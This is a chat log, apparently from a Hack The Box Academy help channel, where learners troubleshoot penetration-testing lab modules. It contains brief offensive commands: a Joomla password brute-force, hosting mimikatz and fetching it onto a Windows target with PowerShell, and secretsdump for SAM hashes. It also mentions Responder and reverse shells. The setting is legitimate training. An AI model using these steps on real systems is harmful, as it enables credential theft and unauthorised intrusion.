you can also press the 'space bar' to see the current progress
@nova nest thanks i'll try to see if that helps figuring out what is going on.
Unfortunately, it may be normal for the nmap scan to take longer than is usual with some machines. There can be various reasons for this.
wrong channel btw: #starting-point is where you wanna go for this question
ah ok thanks
is there an option reset the progress of the module
Hi in Password attacks - pass the hash (pth) - Academy
DC01 What does it represent according to my understanding it's mapped to an IP of the instance running Julio/David, is it correct!?
And MS01 is mapped to the administrator which we gain access via Hash
So while listing the dir \DC01\david
It's equivalent to \(ip-of-david)(share name)
Is this correct?!
DC01/MS01 or whatever hostname represent an IP of a machine, it's not related to any specific user
a user might have certain rights on different machines but a machine is just that, it's not a user
DC stands for domain controller
i dont understand how to work with the vpm files and its driving me crazy(got it working)
Got it! Thanks a lot!
Anyone else working through the Web Proxy module dislike ZAP as much as I do?
Burp is just more intuitive imo.
ZAP feels so discount it's not even funny.
Any hints for finding the upload location in Skill Assessment - File Upload Attacks?
Haven't made it to the skills assessment yet. I just finished Zap Fuzzer. I found the right md5 hash, and then closed out zap and used burp repeater to get the flag lol.
lol you're talking about a different module
I'm an idiot dude, as I was.
On Attacking Enterprise Network
Web Enumeration & Exploitation
Question: Exploit the WordPress instance and find a flag in the web root. Submit the flag value as your answer (flag format: HTB{}).
I found the valid user name as password as per section explains, but when try to login say error 502
Can anyone help???
The section itself explains to do this way
i am a beginner to 'hacking'. where should i start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
nah it's aight lol but yeah I m talking about aa diff module lol
hello can I dm you about that I'm stuck on this one
No
ok
spoiler the aen module, most people want to do it blind
also, treat it as a mock test, don't ask for help unless you're really out of ideas
anyone understand why i get this issue?
python3 joomla-brute.py -u http://IP/ -U users.txt -w tools/Hacker-Toolset/Wordlists/passwords/xato-net-10-million-passwords-100000.txt
Repsonse: admin:123456
it gives me a false response saying its correct
Hi everyone, I'm on Information Gathering - Web Edition, section Active Subdomain Enumeration. I am having issues with finding the number of A records. I can use dig and nslookup to generate the listing of subdomains and their respective IPs but the number I use to answer the question is incorrect. I was wondering if anyone could point me in the right direction, please?
Learning OSI model won't really teach ssh lmao
if a guy dont know what a protocol is
then he might as well just start from begining and learn what OSi is
will get a better understanding
Eh Protocols existed before OSI and OSI model is more about the layers than actual protocols
Just that certain things exist within a stack
i learned about all that , starting from OSi atleast . was giving advice from my pov
then i dived deeper , into other things
¯_(ツ)_/¯

Hi everyone can someone please tell me what tool i can use to find a user and password for following:
Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer.
I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated password list given in module. Any tip to navigate me in right direction?
Has anyone finished the injection attack skills assessment?
You can DM me
thanks
Btw is it normal to have lag when typing during ssh. Im from Asia
hello, what can I use for identify the hashing algorithm that is being use?
If you're referring to hashcracking, hashcat can do so
OUTPUT
```
Token length exception: 1/1 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
```
it is from the bizzness machine
#boxes then
This channel is for assistance with academy modules
Thank you
Good afternoon, when transferring the mimikatz file(that I downloaded using the git clone method) from attacking machine to MS01 internal ip address, it did not work. I guess it will not work since port 80 is not listed as a port for the MS01 ip address when I look at the results of the nmap scan for that IP address. I would have to try an alternative transfer method or something like smbserver (since 445 is listed as a port when doing the nmap scan for that address).
python3 -m http.server 8080
powershell wget -Uri http://10.10.16.125:8080//usr/share/windows-resources/mimikatz/Win32/mimikatz.exe -OutFile mimikatz.exe
Again you're misunderstanding how file sharing works
This is like the smb thing all over again with you
The python web server is hosted in the directory you launch it from
You literally had a similar issue need to be explained to you regarding SMB
i'm once again feeling dumb trying to solve the "Guessable Answers" section of broken authentication module. it says to find a guessable question, but every question that comes up has millions of possible answers
Think dumb
i'm thinking as dumb as i can
Your brain has too many wrinkles then 
Pepperoni London
, jk I haven't done this
i even tried hawaiian
Time for burp repeater?
i'm already trying big word lists but not getting any hits
Hey guys i just finished "Active Directory Enumeration & Attacks -Living Off the Land".
I found the User relatively quickly with the dsquery command ( ||"Betty Ross"|| ). Then i wanted to read the description with net and other commands, but didnt find anything. In the end i loaded bloodhound and figured out she was called ||"BRoss"||. What was the intended way of finding out the naming convention?
iirc try a question with very few possibilities
there aren't any that i've seen 😦
that transfer method worked for me when transferring my agent.exe file to my target machine( and that address had port 80 listed) and the transfer process is similar. 🤷♀️
Its one way. You can do it with powershell too. I personally dig bloodhound.
Learn how the tool you use works
Yeah i really like it aswell, but the module was living off the land, so i kinda cheated 😄
the colour one
try the most common
Thats fair. There is definitely a way to do it with powershell. I'm pretty sure you have to have the activedirectory module loaded. I'd have to go back and read through my notes to be certain, but it can 100% be done with powershell.
Literally all you gotta do here is specify the filename
the error is unable to connect to server isnt it, probably a networking/pivot issue
You have the port: and the file location is where you started the http server
Read closely at their initial command
That's only part of the issue
ah lol
I will try doing it with PS, but i´m done for today
i'm trying 😔
They had the same issue with SMB the other day
i feel like i'm forgetting colors
yea I remember that 
urple, een
I don't know how you folks remember who had what issue, when. lol. I lose track of everyone.
blurple spleen
When someone has a Fundamentals issue that late in the course structure, it sticks
Especially when I was one of the people that helped/explained
I'm thankful for folks having fundamental issues. I don't have to ask the questions 99% of the time. I just search until I find the nudges I need lol.
Can I make videos of machine resolutions that are no longer worth points and post them on YouTube?
Hi, in "BLIND SQL INJECTION skills assessment", I manage to capture Murat's NetNTLM hash on ||Responder|| by using ||simple Windows post exploitation||, but not by using the ||EXEC master..xp_dirtree command||. Is it the expected approach or should there be a working triggering sql ||EXEC|| command that I am missing ?
ok i now have a list of 1150 different color names. hopefully one of them is right
Retired machines are fair game, also wrong channel
Hello, can I speak to someone about the Attacking Common Applications - Skills Assessment I module?
I found the flag but there is something I don't understand and I would like to understand it, if someone can DM me. It concerns the location of the famous file
Just ask
It's likely one of the intended methods
I can't ask without spoilers
wrap the spoilers with double |
That doesn't do much tbh
pfff
And people have had their messages deleted for spoiling with those tags
hm. i'm really surprised the answer isn't "Microsoft Edge Blue"
Obfuscation is better than the spoiler tag
nah it's apple space grey
oh my god
i found it
thanks friendos, y'all are great. i wasn't thinking dumb enough
I see. Kind of goofy but whatever. If people want to spoil a box for themselves, thats kinda on them, but this isn't my show to run.
yes, that's true x)
ok thanks, but do you think there is another approach using sql command that I am missing ? I would like to be aware of it if such a way exists
I.e. J..d..e or j*.txt
I mean if you're an nt authority/system as the sql service: you can likely just read files on that host
Curiosity
It's not so much that they want to, but discord doesn't do much to warn you against clicking spoilers
So on your phone for example you can accidentally click it
Yeah thats fair. You'd kind of need to say hey, spoilers here for this machine at the very least.
to give a little detail without spoilers, I don't understand why the file doesn't have the same path on the app as on the machine, I don't know if that helps x) and why my fuzzing never worked.
And there's no way to unhide it outside of changing tabs
Likely webroot
and even with the right path fuzzing has never worked
I tested gobuster, feroxbuster, ffuf, nothing
Also just depends on how the web app is configured
I've just understood by reading the application's conf file, but finding the location is a guessing . Knowing that the folder in which the file is located returns a 404
Trying to do the "Credential Hunting in Windows" module but lazagne will not finish a single scan. It produces some results in cmd then closes the window abruptly. Have tried outputting the results to a file but that is fruitless too. Checked events on the system and doesnt seem to log anything either. Just need to know if this is normal and im looking for a work around or its an issue?
Because one of the hints says to use lazagne
Hello! I'm in the first section of XSS and I think that **there is an error in this lab**:
- It's not possible even write 'test' and show 'test' like in the example in the section
- About the XSS payloads, it doesn't work, I've tried these payloads but I haven't got success with none:
It doesn't show any kind of alert in the lab. And the question is:
To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url.
Idk if it's my mistake, but **it's supposed to work according to the module**
Im doing ffuf web fuzzing skill assessment and need sanity check for the file extensions question. anyone around that can help? (so I can DM you to verify answers)
But not on mine, nor in others that I have found in this channel (I have seen at least 6 that have had the same problem)
Same thing happened to me, but I only needed the output for one of the answers, so I had time to copy/paste
a simple xss payload would do the job
but if that happens to be too complicated for you open the dev tab and view the cookie directly 😉
not 100% success guarantee sadly
I asked because Id need to DM someone for that since I cant post answers here
Thank you!, I know that there is the cookie but, you know, the labs have to work well and someone can get stuck here for hours thinking that they're wrong but when actually is an error of the lab 😦
yes, iirc you need to actually click the ‘go’ or ‘search’ button on the website for your payload to work
What am I doing wrong with cat ? Seems I can't open anything
url encode spaces
Yes you are so right very naive of me just too tired
Password Attack Lab Hard - These are the hashes I got from the ||SAM file||:
I don't know what to do with them because they are blank/null. Any tips?
admin hashes are cool
I tried to use the admin hash with CME smb and winrm and it doesnt work
I also tried all the other modules for NTLM
read the message hashcat gave you
add --show to your command without the password list; it looks like you already cracked and didn't think about it
||its empty lol ||
it worked on my machine ¯_(ツ)_/¯
isnt that an empty hash though?
i guess you need to pass the whole hash to hashcat like Administrator:xxx:xxxxxxx:xxxxxxxx
Just tried it with the whole hash file that was dumped from SAM. Same result
dm the hash
error is at the top, options under it
don't spoil on others
sorry, should I delete? Not sure how to get help without posting those details
ig it's better to delete it , which section ?
Im in "attacking common applications" in the "attacking wordpress" module, I was able to upload code execution to the plugin, but now I am struggling to get an meterpreter shell
I dont get the error thats listed in the module but I set the options the same way it shows the example to
try to use other payloads
there's no need for meterpreter
this is not the correct hash
what tool did you use to extract the SAM hashes?
secretsdump
Figured it out though thanks to blackwolf
yep secretsdump should be able to give the right hashes
Now I just need to figure out hashcat lol
Not getting that far before it closes. Pretty annoying
I didn't try, but is it possible to write to an output using > creds.txt?
Can someone help me out with the skill assessment for Injection Attacks. Im having issues with my final payload
Tried that, it dies before it gets there so just a blank text output. Thanks anyway though
also tried immediate output redirection but didnt work either
Ive completed the ffuf web fuzzing || Attacking Web Applications with Ffuf module. if anyone ever wants a sanity check or a nudge with that feel free to DM
do you just run it or do you also tell it what to collect?
"all" running it from cmd, it starts gathering data and outputting it in cmd, then after about 8 seconds just closes
Oh yeah I just remember an odd behavior, but it seems like the cmd spawned by lazagne would exit every time I moved away from it, whether it be clicking on my host machine or even in the target RDP session if I brought up the other cmd prompt and moved lazagne to the background it would exit. I found that when I let it run without putting anything on top it wouldn't exit it out automatically 🤔
it looks like your SAM/SYSTEM files may not have copied over correctly
when I did the secretsdump it gave me a username for all associated users with the files
I got an access denied error when trying to do it
he was using secretsdump the wrong way
Doing module "Socat Redirection with a Reverse Shell" now....how do I transfer the payload to the Windows machine?
Do I need to upload it to the ubuntu machine and then from there get it to the Windows machine?
also the mutated list comes in handy ¯_(ツ)_/¯
yes
that's why we use ligolo
should be secretsdump.py -sam SAM -system SYSTEM LOCAL
still need to transfer files somehow
i mean you can use a pivot to transfer
is a file transfer possible from the ip address of an attacking machine to the internal address on a target machine?? I don't get any response back from my internal address when I ping my target or attacking ip address.
yeah but the listeners make it super ez
but you still need an initial access vector
dump question....but how....
scp to the ubuntu and then....
any method of your choice from the file transfer module
well you should have some form of remote access to the windows target
from the Ubuntu Target
Quick question: How do I prevent the pwnbox from resizing to a very small screen when I have the full screen tab and the lab tab open in my browser. Its really driving me nuts.....
this file transfer recommendation will probably work for me
you can't
it's just something you live with
it's how it draws the screen
it is if you have a pivot/way of forwarding the request to your attack machine
Maybe I am missing something here....
In order to get a file on the Windows machine, I first need to setup Dynamic Port Forwarding with SSH and SOCKS Tunneling. That gets me RDP access to the Windows machine from my attack box. From there I can open a web browser and connect back to my web server to get the payload.
Then I dismantle that SOCKS tunnel so that I can do a bind shell?
I think I am lost
well thats some poor user experience design. Will the lab keep running if I close the tab?
yeah it's one of those weird scenarios
it's moreso assuming you have some access to this network; and need to further pivot on the domain
yes
it's how vnc draws the screen; you just refresh and it fixes it
Can someone please help me with question 2 in "Analyzing Evil With Sysmon & Event Logs?" I'm stuck I don't know what I'm doing wrong. Can someone please sort me out? Thank you!
The File Inclusion module's Skill Assessment is an apache start page. If this is intentional that's fine. But it's quite different than other skill assessments so I just wanted to confirm something isn't amiss. Ill just keep fuzzing anyway
Edit: no it isn't, I need to read more lol
enumerate more
Ah got it. SSH!! Clearly I need more caffeine.
And this is prevention. Got really ahead of myself there LOL



